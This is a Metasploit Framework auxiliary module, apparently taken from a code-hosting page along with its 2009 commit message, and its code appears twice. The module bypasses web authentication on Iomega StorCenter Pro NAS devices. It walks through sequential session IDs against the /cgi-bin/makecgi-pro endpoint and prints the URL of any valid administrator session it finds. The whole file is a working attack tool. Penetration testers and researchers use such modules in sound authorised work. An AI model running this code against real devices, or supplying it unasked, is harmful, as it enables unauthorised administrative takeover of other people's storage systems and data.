metasploit-framework/modules/auxiliary/admin/http/iomega_storcenterpro_sessio...

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize
		super(
			'Name'        => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
			'Version'     => '$Revision$',
			'Description' => %q{
				The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
				allowing for simple brute force attacks to bypass authentication and gain administrative
				access.
				},
			'References'  =>
				[
					#['URL', 'http://www.aushack.com/'], # No refs. New vuln?
				],
			'Author'      => [ 'patrick' ],
			'License'     => MSF_LICENSE
		)

		register_options(
			[
				Opt::RPORT(80),
			], self.class)
	end

	def run
		100.times do |x|
			begin
				print_status("Searching for a valid session ID.")

				res = send_request_raw({
					'uri'     => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
					'method'  => 'GET',
				}, 25)

				if (res.to_s =~ /Log out/)
					print_status("Found valid session ID number #{x}!")
					print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
					break
				end

			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
				print_status("Unable to connect to #{rhost}:#{rport}.")
				break
			rescue ::Timeout::Error, ::Errno::EPIPE
			end
		end
	end
end
Added iomega_storcentrepro_sessionid aux module. git-svn-id: file:///home/svn/framework3/trunk@6733 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-01 03:55:56 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`


			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize`
			`super(`
			`'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',`
			`'Version' => '$Revision$',`
			`'Description' => %q{`
			`The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,`
			`allowing for simple brute force attacks to bypass authentication and gain administrative`
			`access.`
			`},`
			`'References' =>`
			`[`
			`#['URL', 'http://www.aushack.com/'], # No refs. New vuln?`
			`],`
			`'Author' => [ 'patrick' ],`
			`'License' => MSF_LICENSE`
			`)`

			`register_options(`
			`[`
			`Opt::RPORT(80),`
			`], self.class)`
			`end`

			`def run`
			`100.times do \|x\|`
			`begin`
			`print_status("Searching for a valid session ID.")`

			`res = send_request_raw({`
			`'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",`
			`'method' => 'GET',`
			`}, 25)`

			`if (res.to_s =~ /Log out/)`
			`print_status("Found valid session ID number #{x}!")`
			`print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")`
			`break`
			`end`

			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`print_status("Unable to connect to #{rhost}:#{rport}.")`
			`break`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`end`
			`end`
			`end`
			`end`